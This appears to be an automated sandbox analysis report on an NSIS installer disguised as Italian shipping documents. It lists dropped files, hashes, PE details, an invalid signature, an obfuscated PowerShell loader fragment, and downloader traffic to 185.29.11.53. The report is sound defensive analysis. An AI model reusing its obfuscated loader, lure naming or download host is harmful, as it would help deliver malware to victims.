SHA-256:	01E72332362345C415A7EDCB366D6A1B52BE9AC6E946FB9DA49785C140BA1A4B
SHA-512:	3A76E0E259A0CA12275FED922CE6E01BDFD9E33BA85973E80101B8025EF9243F5E32461A113BBCC6AA75E40894BB5D3A42D6B21045517B6B3CF12D76B4CFA36A
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 4hIPvzV6a2.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.14191.25974.exe, Detection: malicious, Browse Filename: 3Dut8dFCwD.exe, Detection: malicious, Browse Filename: Ms63nDrOBa.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.PUA.Tool.InstSrv.10.1046.23999.exe, Detection: malicious, Browse Filename: rSCAN31804.exe, Detection: malicious, Browse Filename: rSCAN31804.exe, Detection: malicious, Browse Filename: SCAN00381638.SCR.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................,.................Rich...........................PE..L...Q.d...........!......................... ...............................P............@..........................$..l.... ..P............................@....................................................... ...............................text............................... ..`.rdata..<.... ......................@..@.data........0......................@....reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	748488
Entropy (8bit):	7.618269683518012
Encrypted:	false
SSDEEP:	12288:nfLdembnSidSCwsYk8KSO4nMUBOGmJ9R01jS+VBtyS9TvkXFDsiJjWlWVB0mPH:nfLNnSsms/8K54nsVJ9F+VHtkXF4i7XH
MD5:	6C446FD0A3F6D498F5CBD0725CE7F232
SHA1:	D814C5F4BC9A61690318BA2ED8EC22D55AF16CCE
SHA-256:	8A149E1DED1CCE5485B9783687DD8F94C2F3926EDD17E62A682FE56CC73B1AE4
SHA-512:	7A2F40DE4785734831AB45945D2A7C0D610D597DB90AAC644FACA8C0A4F4D35A4D7D0B2C9397C41F8FC993B91D5EE4BDD5D1E870488CE49F11F34ECB3939B746
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 8%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...l.d.................j..........25............@.......................................@..........................................P...d...........a..0............................................................................................text....h.......j.................. ..`.rdata..d............n..............@..@.data...............................@....ndata.......P...........................rsrc....d...P...f..................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\acneform\Documenti di spedizione 0009333000459595995.exe:Zone.Identifier

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	26
Entropy (8bit):	3.95006375643621
Encrypted:	false
SSDEEP:	3:ggPYV:rPYV
MD5:	187F488E27DB4AF347237FE461A079AD
SHA1:	6693BA299EC1881249D59262276A0D2CB21F8E64
SHA-256:	255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
SHA-512:	89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
Malicious:	false
Preview:	[ZoneTransfer]....ZoneId=0

C:\Users\user\AppData\Local\acneform\Dyssen.Mod

Download File

Process:	C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	70325
Entropy (8bit):	5.158902637069244
Encrypted:	false
SSDEEP:	1536:7Y7brIQR5wdxbwMj3Li8faaKW0UW9AeKnXhSh04R/ID1d2Xnaah6:8HMQkbwMDlipG/BxfUIhl
MD5:	28CAA5C31A5E71EAE249CDDEB36BDC2E
SHA1:	0FA31BF12563C08257F3DEF568BBE50F12667418
SHA-256:	1248FC3D0506610988E6606216DB30BB9018A411DB91FEBA6F4E2860E98BC967
SHA-512:	E866F480B2ECD12324D9B5237B0B0EBFEA13582A8AEB6B1D143BD015C1F5971E4BDF350DBA46EE805696BB0A38422370BB6147F341AF1F8359ECF1BF047B0588
Malicious:	false
Preview:	$England=$Crispate;<#Skied Beggarly Chalkier Schematical daedaleous Opfinderpris #><#Ddssejlers Cress Suprastigmal #><#Kasketten Palaeornithinae Udstyrsforretningen #><#Ggeblommes Biseriate Fadlsankeret Pensaenes Resurcen #><#Blusteringly Spaltenumrene Parmesanosten #><#nervepatients Skibob Extragalactic Athenaea lykkes #>$Talemaskinen = "sti lne;,phinct`$ Ba,kereexcremelstyloaueRowel ec Hg edetGymnasirMembrano PublikpSfor ikh Unharmy Flau.ts mcgo.aiHealthio PolitilTornensoRverhisgFulmineiDrivgarc reweig=Feriela`$BilagetcCelestioNon nimlDiabetelTwirleduDiscip.s ElemeniOvercenoForraadnSammen.;Bindevvf Ramibiu PedatenRegres c Detentt NeckiniSelvagto gravrsnDokumen SkistvlRDiss,rtePo.yentt.lotricrbebudepaPreapplc Sulfa,tskribleoArtiller Amanues Under Fortovs( lumred`$TyndsliPSlikkero SnildesReval.itsnyltepeWisecrajGumlend2se iepr5Samfund3Rei rig,,videns`$alto.etRSobberaaParoxyslGraferslOestom,erverhi dResoluteBemgdhasChauvinr OpbevaeIn,ramndRechase9Chondr 9T lecom) R,euma Unvenee{,utcaro

C:\Users\user\AppData\Local\acneform\afplingen.che

Download File

Process:	C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
File Type:	data
Category:	dropped
Size (bytes):	245776
Entropy (8bit):	1.2423947315855175
Encrypted:	false
SSDEEP:	768:7x19EzEPqdI04IDk5wH/o606sFjlhpHi98oiQErpn6jGW3LSSW1Vn+7xd4R89Z9u:13ujvdGpic/cN2q8+js/5/H
MD5:	9F9EC5CB34B99692A4EAC963634A7D82
SHA1:	5C1C97F3B00365F6CDB43112D31D7DD3AA050870
SHA-256:	7579E3606C789ED66E555D541F14BDA6ECAEA4B2EB7B7BC3A25E7C804B3AB48F
SHA-512:	A574404306396B333F64FC16256C093CA1F2B6CF87E5675ED678F00DE3B899FFE4A95CBA4D1113B9C86B8C46549D06D7AB97930955F921CD73AE37D4067B1EB0
Malicious:	false
Preview:	......................................................{............J...............l....................w...........N....................................................................\.........................................\|.........................{..............i.................................k...............!......&..............................................................................................................."...........................t.:...s............................................................A...................................................................d.........................2.......\|................................................Y............&...............................5.......(................................`..............................*............i..........................................>........................................~.....................................................................................................I

C:\Users\user\AppData\Local\acneform\forlggere.bov

Download File

Process:	C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
File Type:	data
Category:	dropped
Size (bytes):	452228
Entropy (8bit):	1.250842541049128
Encrypted:	false
SSDEEP:	768:qlmssNPVJP2ri6hEVTp7WLL1GEOCTOemgej7kcwntQz2Y1drtNhgCV+AhB/7/dR+:5tvPloD3bnq3TzwesbDEfLeaz6oSzjU8
MD5:	30C2C02FB78EFAA65C6A38457A7DC4F6
SHA1:	40AEF6B9982695F88F0515104BFEEACFAF22FEDA
SHA-256:	CE57C2DEDAA3A0FD5F5C267F3336F5ACB6109D00D31A98D4638D26A77939CEFC
SHA-512:	8AC0B2E7831C801D7C4043195BEFC309F2C79BE719FF0171D0A4E580671EBADD2F737C307A4AAE2E548705CD11B24FE64F07C6E842D7DD5D3CCD88EA677BC7FA
Malicious:	false
Preview:	...........................................t..................................................................................................a..............d...........................o.........................=..#..............0.........<.........0.......................>..........`..........................................................................................:.........u.............................................0.................................C..~.............................................X......................................................"............................f........................................w.................................{............................"..................e........................................f...........l...............................................I............................ Z...........................;.............;.................................u.................................................................%....

C:\Users\user\AppData\Local\acneform\okapier.Com

Download File

Process:	C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
File Type:	data
Category:	dropped
Size (bytes):	344050
Entropy (8bit):	7.580146229974094
Encrypted:	false
SSDEEP:	6144:9ruXsLmgXj+a9etxVoOztIvtqYNsTOwJOBQ7Uv:9aumgXetHoStettqTOwaQYv
MD5:	39486BA352B5221ADE774BCECDE6F4DB
SHA1:	1E37B8B97559B16397301136B7B4ABFF7C50E86C
SHA-256:	9B9BFB77B758FA9BE7BDDB087F9E0893755B7455BC5AF6DA4E929E0EE3270D8D
SHA-512:	1DBA6E25006FA096DD90C7A64097D5F3CFBA857E14D4C32FBC9F4CA04E8E33D744B2C7048B569446024E9CF78577D4240C004BCF7ADE91839D7FAAE1CE864495
Malicious:	false
Preview:	....................j..hh....i........22..................................,,...$..AAA.............".._..........[.r.............U................^^^......PP........,.....qqq...................++.................\|.#.....PPPPP............$$.R.NN...TTT...AA.jjjj.........................B.........y............~.666. .qqq.p...o................###...P..............p.......................5...................GG...........111........v...............SS....^...................z.D...nn.L.........:..........EEEE.ll..........####.^^................GGG................................7777...........Y...hh...w..............llll....A.u.JJ.M....t........8....[.\|...-----.((.Z.RR...................................r.f.wwwwwww..s.....zzz..................q...D.........................................f.MM.\|...............................................M.V..........K..mmm....R........!.........u..........m....3..........$$.....................uuu.............U...................D......LL..........W..........

C:\Users\user\AppData\Local\acneform\rettersted.bef

Download File

Process:	C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
File Type:	data
Category:	dropped
Size (bytes):	328009
Entropy (8bit):	1.2551228776153396
Encrypted:	false
SSDEEP:	1536:AfCPIKQLWsgBwj5eZNb+h+QkSGkJPsGyksKU:ATKZNbTQkSGky0sKU
MD5:	78C7002A6C29415CEA767894F99BDF01
SHA1:	37B39AF4E61D2A97D1B1AEA54D1C3C3D8C3AD6D8
SHA-256:	414BB9BB930F1269088CF9BF027667E6B9A4130E6E719E7C178406A8C8C3183E
SHA-512:	A39B5656AF287783AB4C5E211C148D2D233AB635E8D8C4870693D31267904E9C94A3BCC07B20F92C55F68BC7E6E2B5F1D22C6ED3F9B3A729CABD14B2E7B58D58
Malicious:	false
Preview:	..............................................A............................................]..............2.................................N.................................................................................................................................i.......................................................................................X............h...................j...........,............)...w....................................R.................................V...............................................................R.../.........................................)...................................................].............................,...v............................................./.......................................`........)........#..........x............H.....................................v..........K..........................................................................................................*............................

C:\Users\user\AppData\Local\acneform\xenosaurid.txt

Download File

Process:	C:\Users\user\Desktop\Documenti di spedizione 0009333000459595995.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	453
Entropy (8bit):	4.241518252490206
Encrypted:	false
SSDEEP:	6:mTXCFWRbo5FpTNrQNFqqhq48RZ8av8Atp3d6G4bg3pCp+oWKHYAtpcRvFVTZqIMC:0X4OA7aY48MNAtDMeExYAYdfqI1f1o2
MD5:	261F38F05E7DE27DA302C07B62E1F94D
SHA1:	8D495D43FC7A2B40C52B8D31678F24B519257610
SHA-256:	50D950EE2F6CD5D31AAA35B913DC46C8EEE3120B7444EF5EBB302B88851F3328
SHA-512:	62106A1D3608A63C12D6E9A7A00FD775ECD38193B779D4C13E18850230F1C7A1F0BD5DF0602AF5553F24BB0BAD6703BB9DC00C09C14E91DD098CE4EC95050E47
Malicious:	false
Preview:	stulls sprttede trlkvinder materialerne,disciplinerendes antirailwayist topchefs dhyana behovsanalyserne,vager cimnel bonderve debitable karyotin sadelmagervrkstederne samfundskonomien plakatopstning horologe vaner taleruafhaengigt..flimmer carryout arbejdsdisketterne breakaxe vidtaabne elastose.attestationerne mennonist rubicon barogrammerne respectively reddet overretention,brdknivenes yndlingsbog ministate paleogeographically repenalize henriett.

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Entropy (8bit):	7.618269683518012
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Documenti di spedizione 0009333000459595995.exe
File size:	748'488 bytes
MD5:	6c446fd0a3f6d498f5cbd0725ce7f232
SHA1:	d814c5f4bc9a61690318ba2ed8ec22d55af16cce
SHA256:	8a149e1ded1cce5485b9783687dd8f94c2f3926edd17e62a682fe56cc73b1ae4
SHA512:	7a2f40de4785734831ab45945d2a7c0d610d597db90aac644faca8c0a4f4d35a4d7d0b2c9397c41f8fc993b91d5ee4bdd5d1e870488ce49f11f34ecb3939b746
SSDEEP:	12288:nfLdembnSidSCwsYk8KSO4nMUBOGmJ9R01jS+VBtyS9TvkXFDsiJjWlWVB0mPH:nfLNnSsms/8K54nsVJ9F+VHtkXF4i7XH
TLSH:	ADF412087FA8E5E1C1E6AB7E09B2839716F0B5C615595F03B214FF1E1D6D282860AFF4
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN..s~..PN..VH..PN.Rich.PN.........................PE..L...l..d.................j.........

File Icon


Icon Hash:	2b25372d4e5ad12f

Static PE Info

General

Entrypoint:	0x403532
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x64A0DC6C [Sun Jul 2 02:09:48 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f4639a0b3116c2cfc71144b88a929cfd

Authenticode Signature

Signature Valid:	false
Signature Issuer:	CN="Aeroframes Aflytningssystemer Bjergbestigerne ", E=Aktieprotokols@Prendre.sta, L=Chennevi\xe8res-sur-Marne, S=\xcele-de-France, C=FR
Signature Validation Error:	A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
Error Number:	-2146762487
Not Before, Not After	02/03/2024 06:36:00 02/03/2027 06:36:00
Subject Chain	CN="Aeroframes Aflytningssystemer Bjergbestigerne ", E=Aktieprotokols@Prendre.sta, L=Chennevi\xe8res-sur-Marne, S=\xcele-de-France, C=FR
Version:	3
Thumbprint MD5:	A9C1798AF54D650775446A3D80B6BF4B
Thumbprint SHA-1:	41B8490F4D70C866BC6B40E3C8D4461298D816A5
Thumbprint SHA-256:	F002E1A6B744FBD194BA357AD5DCAEE7A641A9BEBA07454EAEE85F88880AC806
Serial:	1B8139F2ED8C7949105AC8BB448E4891F8934F87

Entrypoint Preview

Instruction
sub esp, 000003F8h
push ebp
push esi
push edi
push 00000020h
pop edi
xor ebp, ebp
push 00008001h
mov dword ptr [esp+20h], ebp
mov dword ptr [esp+18h], 0040A2D8h
mov dword ptr [esp+14h], ebp
call dword ptr [004080A4h]
mov esi, dword ptr [004080A8h]
lea eax, dword ptr [esp+34h]
push eax
mov dword ptr [esp+4Ch], ebp
mov dword ptr [esp+0000014Ch], ebp
mov dword ptr [esp+00000150h], ebp
mov dword ptr [esp+38h], 0000011Ch
call esi
test eax, eax
jne 00007F1C0CD6F1BAh
lea eax, dword ptr [esp+34h]
mov dword ptr [esp+34h], 00000114h
push eax
call esi
mov ax, word ptr [esp+48h]
mov ecx, dword ptr [esp+62h]
sub ax, 00000053h
add ecx, FFFFFFD0h
neg ax
sbb eax, eax
mov byte ptr [esp+0000014Eh], 00000004h
not eax
and eax, ecx
mov word ptr [esp+00000148h], ax
cmp dword ptr [esp+38h], 0Ah
jnc 00007F1C0CD6F188h
and word ptr [esp+42h], 0000h
mov eax, dword ptr [esp+40h]
movzx ecx, byte ptr [esp+3Ch]
mov dword ptr [004347B8h], eax
xor eax, eax
mov ah, byte ptr [esp+38h]
movzx eax, ax
or eax, ecx
xor ecx, ecx
mov ch, byte ptr [esp+00000148h]
movzx ecx, cx
shl eax, 10h
or eax, ecx
movzx ecx, byte ptr [esp+0000004Eh]

Rich Headers

Programming Language:

[EXP] VC++ 6.0 SP5 build 8804

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x8608	0xa0	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x65000	0x264e8	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0xb6198	0xa30
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2a8	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x68d8	0x6a00	742185983fa6320c910f81782213e56f	False	0.6695165094339622	data	6.478461709868021	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x1464	0x1600	a995b118b38426885fc6ccaa984c8b7a	False	0.4314630681818182	data	4.969091535632612	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xa000	0x2a818	0x600	9a9bf385a30f1656fc362172b16d9268	False	0.5247395833333334	data	4.172601271908501	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x35000	0x30000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x65000	0x264e8	0x26600	8c15b9178dda9297a3b68e6314e77cb0	False	0.48827488802931596	data	5.053989943267582	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x652c8	0x10828	Device independent bitmap graphic, 128 x 256 x 32, image size 65536	English	United States	0.4677629244055365
RT_ICON	0x75af0	0x94a8	Device independent bitmap graphic, 96 x 192 x 32, image size 36864	English	United States	0.5025751524069791
RT_ICON	0x7ef98	0x5488	Device independent bitmap graphic, 72 x 144 x 32, image size 20736	English	United States	0.5306377079482439
RT_ICON	0x84420	0x4228	Device independent bitmap graphic, 64 x 128 x 32, image size 16384	English	United States	0.5394426074633916
RT_ICON	0x88648	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 9216	English	United States	0.5737551867219917
RT_DIALOG	0x8abf0	0x100	data	English	United States	0.5234375
RT_DIALOG	0x8acf0	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x8ae10	0xc4	data	English	United States	0.5918367346938775
RT_DIALOG	0x8aed8	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x8af38	0x4c	data	English	United States	0.8157894736842105
RT_VERSION	0x8af88	0x21c	data	English	United States	0.5388888888888889
RT_MANIFEST	0x8b1a8	0x33e	XML 1.0 document, ASCII text, with very long lines (830), with no line terminators	English	United States	0.5542168674698795

Imports

DLL	Import
ADVAPI32.dll	RegEnumValueW, RegEnumKeyW, RegQueryValueExW, RegSetValueExW, RegCloseKey, RegDeleteValueW, RegDeleteKeyW, AdjustTokenPrivileges, LookupPrivilegeValueW, OpenProcessToken, RegOpenKeyExW, RegCreateKeyExW
SHELL32.dll	SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW, ShellExecuteExW
ole32.dll	CoCreateInstance, OleUninitialize, OleInitialize, IIDFromString, CoTaskMemFree
COMCTL32.dll	ImageList_Destroy, ImageList_AddMasked, ImageList_Create
USER32.dll	MessageBoxIndirectW, GetDlgItemTextW, SetDlgItemTextW, CreatePopupMenu, AppendMenuW, TrackPopupMenu, OpenClipboard, EmptyClipboard, SetClipboardData, CloseClipboard, IsWindowVisible, CallWindowProcW, GetMessagePos, CheckDlgButton, LoadCursorW, SetCursor, GetSysColor, SetWindowPos, GetWindowLongW, IsWindowEnabled, SetClassLongW, GetSystemMenu, EnableMenuItem, GetWindowRect, ScreenToClient, EndDialog, RegisterClassW, SystemParametersInfoW, CharPrevW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, FindWindowExW, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, CharNextA, wsprintfA, DispatchMessageW, CreateWindowExW, PeekMessageW, GetSystemMetrics
GDI32.dll	GetDeviceCaps, SetBkColor, SelectObject, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor
KERNEL32.dll	lstrcmpiA, CreateFileW, GetTempFileNameW, RemoveDirectoryW, CreateProcessW, CreateDirectoryW, GetLastError, CreateThread, GlobalLock, GlobalUnlock, GetDiskFreeSpaceW, WideCharToMultiByte, lstrcpynW, lstrlenW, SetErrorMode, GetVersionExW, GetCommandLineW, GetTempPathW, GetWindowsDirectoryW, WriteFile, CopyFileW, ExitProcess, GetCurrentProcess, GetModuleFileNameW, GetFileSize, GetTickCount, Sleep, SetFileAttributesW, GetFileAttributesW, SetCurrentDirectoryW, MoveFileW, GetFullPathNameW, GetShortPathNameW, SearchPathW, CompareFileTime, SetFileTime, CloseHandle, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalFree, GlobalAlloc, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, lstrlenA, MultiByteToWideChar, ReadFile, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, MulDiv, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, SetEnvironmentVariableW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-09-25T12:09:07.525705+0200	2803270	ETPRO MALWARE Common Downloader Header Pattern UHCa	2	192.168.2.4	49737	185.29.11.53	80	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 12:09:06.864101887 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:06.924427032 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:06.924531937 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:06.924766064 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:06.929584980 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.525511980 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.525562048 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.525576115 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.525592089 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.525605917 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.525619984 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.525705099 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.525826931 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.606007099 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.606035948 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.606051922 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.606065989 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.606085062 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.606086016 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.606092930 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.606108904 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.606120110 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.606127024 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.606142998 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.606142998 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.606161118 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.606185913 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.611905098 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.611958027 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.611958981 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.611974955 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.611989021 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.611999035 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.612030029 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.685673952 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.685699940 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.685728073 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.685736895 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.685740948 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.685779095 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.685779095 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.685832024 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.685848951 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.685864925 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.685868979 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.685894012 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.685914040 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.686274052 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.686291933 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.686306000 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.686317921 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.686335087 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.692287922 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.692312002 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.692327976 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.692336082 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.692357063 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.692379951 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.692742109 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.692756891 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.692778111 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.692779064 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.692797899 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.692811966 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.692918062 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.692934990 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.692950010 CEST	80	49737	185.29.11.53	192.168.2.4
Sep 25, 2024 12:09:07.692955017 CEST	49737	80	192.168.2.4	185.29.11.53
Sep 25, 2024 12:09:07.692966938 CEST	80	49737	185.29.11.53	192.168.2.4
